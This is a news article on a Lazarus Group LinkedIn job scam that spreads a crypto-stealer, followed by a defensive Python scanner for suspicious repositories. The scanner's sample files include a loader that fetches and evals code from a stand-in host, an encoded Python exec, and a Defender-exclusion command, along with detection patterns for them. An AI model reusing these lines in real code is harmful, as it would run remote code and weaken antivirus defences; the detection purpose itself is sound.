Lazarus Group tricks job seekers on LinkedIn with crypto-stealer

North Korea-linked Lazarus Group is duping job seekers and professionals in an ongoing campaign that runs a LinkedIn recruiting scam to capture browser credentials, steal crypto wallet data, and establish persistence.

According to a discovery made by BitDefender Labs, the threat actors reach out with fake LinkedIn job offers to lure victims into downloading and executing a JavaScript info-stealer from a third-party endpoint. "Our researchers noted that the payload is a cross-platform info-stealer that can be deployed on Windows, MacOS and Linux operating systems," BitDefender researchers said in a blog post. "This info-stealer is engineered to target a range of popular cryptocurrency wallets by looking up for the crypto-related browsing extensions with (a list of) IDs."

Analysis of the malware and operational tactics let the researchers link the campaign to North Korean threat actors, specifically APT38, based on the group's previous campaigns built around fake job offers and applications. Quite interestingly, the discovery was made possible by the campaign operators themselves: by mistake, they sent a job offer to one of the BitDefender researchers.

The blog post added that the campaign began with an enticing LinkedIn message offering to collaborate on a decentralized cryptocurrency exchange. If the recipient showed interest, they were asked for a CV or a personal GitHub link (which could themselves be put to malicious use), after which the criminal shared a repository containing the "minimum viable product" (MVP) of the fake crypto project. A document with questions was also sent along; these could only be answered by executing the demo prompted on the repository link, which in turn initiates the malware dropper, the blog post added.

Various LinkedIn and Reddit users have separately reported similar activity, with the attackers asking them either to clone the malicious repository and run it locally or to fix bugs in its code.

BitDefender is warning of the red flags associated with this campaign, including vague job descriptions, suspicious repositories, and poor communication, to help individuals protect themselves.

A similar attack was reported earlier this week, in which DPRK-backed threat actors were found using a new variant of the macOS Ferret malware family for their "Contagious Interviews" campaign.

Layered attack chain for crypto-theft and credential stealing

The payload used by the attackers was observed to be a cross-platform info-stealer targeting cryptocurrency wallets. On execution, the stealer collects crypto-related files and the login data of the browsers in use and sends them to a server that, the researchers noted, already held unrelated malicious data.

After this primary exfiltration, the stealer downloads and executes a secondary Python script, main99_65.py, which has dedicated functions for malicious activities, including harvesting and extracting crypto-related data (mlip.py), maintaining persistence (pay.py), and collecting sensitive browser data such as logins and payment info (bow.py).

Another payload, a .NET binary, drops dependencies on the victim's system that add malicious scripts for modifying the Microsoft Defender exception list and establishing C2 communications. It also carries a binary that enables the download of an additional executable containing multiple malware modules, including backdoors, stealers, crypto-miners, and keyloggers. "The threat actors' infection chain is complex, containing malicious software written in multiple programming languages and using a variety of technologies, such as multi-layered Python scripts," the researchers said.
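The practical defence the article implies is to triage a "take-home" repository before running anything in it. The script below is an added example, not code from BitDefender or CSO, that scans an in-memory copy of a cloned repository for the patterns the article describes: JavaScript that fetches and evaluates remote code, Python that decodes and `exec`s an embedded layer, references to the second-stage file names the article names (main99_65.py, mlip.py, pay.py, bow.py), and scripts that add Microsoft Defender exclusions. The sample repository contents, the rule names and the verdict thresholds are constructed for the example; the article does not say how the Defender exception list is modified, so the `Add-MpPreference` rule is an assumption about one common mechanism. Requiring two patterns to co-occur in one file keeps a lone `eval()` from firing on its own.

```python
"""Pre-execution triage of a cloned repository for the red flags described above."""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Second-stage file names the article attributes to the campaign (taken from the page).
KNOWN_STAGE_FILES = ("main99_65.py", "mlip.py", "pay.py", "bow.py")
STAGE_NAME_RE = re.compile("|".join(re.escape(n) for n in KNOWN_STAGE_FILES))


@dataclass(frozen=True)
class Finding:
    path: str
    rule: str
    evidence: str


# (rule id, file extensions it applies to, regexes that must ALL match somewhere in the file).
# Co-occurrence is the point: eval() alone is noise, eval() beside a network fetch is a remote loader.
RULES: List[Tuple[str, Tuple[str, ...], List[str]]] = [
    ("js-remote-code-eval", (".js", ".mjs", ".cjs", ".ts"),
     [r"\b(eval|new\s+Function)\s*\(", r"\b(fetch|axios|https?\.get|request)\s*\("]),
    ("py-layered-exec", (".py",),
     [r"\b(exec|eval)\s*\(", r"\b(b64decode|decompress|unhexlify)\s*\("]),
    # Assumption: exclusions added via the Add-MpPreference cmdlet (the article names no mechanism).
    ("defender-exclusion-change", (".ps1", ".bat", ".cmd", ".py", ".js"),
     [r"Add-MpPreference", r"-Exclusion(Path|Process|Extension)"]),
]

# Any of these rules on its own is enough to refuse to run the repository.
BLOCKING_RULES = {"js-remote-code-eval", "known-stage-filename", "defender-exclusion-change"}


def scan_file(path: str, text: str) -> List[Finding]:
    """Apply every rule to one file and return the findings (empty list if clean)."""
    findings: List[Finding] = []
    for rule, exts, patterns in RULES:
        if not path.lower().endswith(exts):
            continue
        matches = [re.search(p, text) for p in patterns]
        if all(matches):
            findings.append(Finding(path, rule, "; ".join(m.group(0) for m in matches if m)))
    # Known second-stage names, either as this file's own name or referenced in its contents.
    basename = path.rsplit("/", 1)[-1]
    hit = STAGE_NAME_RE.search(text)
    if hit or basename in KNOWN_STAGE_FILES:
        findings.append(Finding(path, "known-stage-filename", hit.group(0) if hit else basename))
    return findings


def scan_repo(files: Dict[str, str]) -> List[Finding]:
    """Scan a mapping of relative path -> file text (what a checkout would contain)."""
    findings: List[Finding] = []
    for path in sorted(files):
        findings.extend(scan_file(path, files[path]))
    return findings


def verdict(findings: List[Finding]) -> str:
    """'do-not-run' if any blocking rule fired, 'review' for lesser hits, else 'clean'."""
    rules = {f.rule for f in findings}
    if rules & BLOCKING_RULES:
        return "do-not-run"
    return "review" if findings else "clean"


# Constructed sample checkout shaped like the fake "MVP" project the article describes.
SAMPLE_REPO: Dict[str, str] = {
    "README.md": "# DEX demo (MVP)\nRun `node demo/server.js`, then answer the questions document.\n",
    "demo/server.js": (
        "const express = require('express');\n"
        "async function boot() {\n"
        "  const r = await fetch('https://cdn.example.invalid/loader.js');  // constructed URL\n"
        "  eval(await r.text());\n"
        "}\nboot();\n"
    ),
    "scripts/setup.py": "import base64, zlib\nblob = 'eJw...'\nexec(zlib.decompress(base64.b64decode(blob)))\n",
    "scripts/main99_65.py": "import mlip, pay, bow\n",
    "tools/setup.ps1": "Add-MpPreference -ExclusionPath $env:TEMP\n",
    "src/wallet.js": "export const fmt = (n) => n.toFixed(2);\n",
    "src/calc.js": "module.exports = (s) => eval(s);\n",  # lone eval: should NOT fire
}

if __name__ == "__main__":
    results = scan_repo(SAMPLE_REPO)
    for f in results:
        print(f"{f.rule:28} {f.path:24} {f.evidence}")
    print("verdict:", verdict(results))
```

Run against the sample checkout the scanner reports four findings (the remote-eval loader, the layered Python stage, the known second-stage file name and the Defender exclusion script) and a `do-not-run` verdict, while `src/calc.js` with its bare `eval()` stays silent. The rules are deliberately coarse string heuristics; they are a reason to stop and look, not a substitute for running unknown code in an isolated, disposable environment.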

First seen on csoonline.com

Jump to article: www.csoonline.com/article/3818521/lazarus-group-tricks-job-seekers-on-linkedin-with-crypto-stealer.html
